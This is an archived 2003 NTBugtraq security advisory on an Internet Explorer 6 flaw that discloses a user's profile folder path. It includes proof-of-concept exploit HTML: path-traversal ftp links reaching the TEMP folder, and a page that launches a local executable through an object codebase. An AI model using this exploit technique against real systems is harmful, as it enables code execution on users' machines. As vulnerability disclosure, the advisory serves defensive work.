Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
From: Eiji James Yoshida (ptrs-ejy_at_BP.IIJ4U.OR.JP)
Date: 06/05/03
- Previous message: Russ: "Administrivia: Response to OIS Draft on "Security Vulnerability and Response Process""
- Next in thread: Russ: "Re: Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability"
- Maybe reply: Russ: "Re: Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 6 Jun 2003 03:28:00 +0900 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]
Date:
~~~~~~~~~~~~~~~~~
5 June 2003
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP3 Internet Explorer 6.0 SP1
Overview:
~~~~~~~~~~~~~~~~~
A remote attacker is able to gain access to the path of the %USERPROFILE% folder
without guessing a target user name by this vulnerability.
ex.) %USERPROFILE% = "C:\Documents and Settings\victim"
Details:
~~~~~~~~~~~~~~~~~
This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".
For example, the exploit of "Georgi Guninski security advisory #9"
needs to know the path of "%TEMP%".
http://www.guninski.com/eml-desc.html
In his advisory, he is guessing the path of "%TEMP%".
You need to know a user name for guessing a path of "%TEMP%".
In such a case, the vulnerability which I found is useful.
"%TEMP%" = "%USERPROFILE%\Local Settings\TEMP"
<a href="ftp://%@/../../../../LOCALS~1/TEMP/" TYPE="text/html">Exploit</a>
If an intruder can create a malicious file in the "%TEMP%" directory,
this file is opened by the vulnerability.
<a href="ftp://%@/../../../../LOCALS~1/TEMP/malicious_file">Exploit</a>
Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************
[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>
[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
Workaround:
~~~~~~~~~~~~~~~~~
None.
Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.
- ------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejy@bp.iij4u.or.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida
iQA/AwUBPt+Jq/fWv13kjJq0EQLpZACghZlXKmIfsj21onH2OAtgxhNCGX0An0X6
YOXFA4JL263QfDTAUDKKj9pt
=Y+LE
-----END PGP SIGNATURE-----
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by TruSecure
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
FREE 14-DAY TRIAL of New Threat & Vulnerability Notification Service
TruSecure's new IntelliShield(tm) web-based threat and vulnerability
service isn't your typical alert service. Supported by TruSecure's vast
intelligence resources - including the ICSA Labs - IntelliShield's early
warning, analysis, decision support, and threat management tools provide
organizations with unmatched intelligence to better protect critical
information assets. Experience it for yourself - just click below to begin
your FREE, NO OBLIGATION 14-day trial today!
http://www.trusecure.com/offer/s0074/
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
- Previous message: Russ: "Administrivia: Response to OIS Draft on "Security Vulnerability and Response Process""
- Next in thread: Russ: "Re: Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability"
- Maybe reply: Russ: "Re: Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
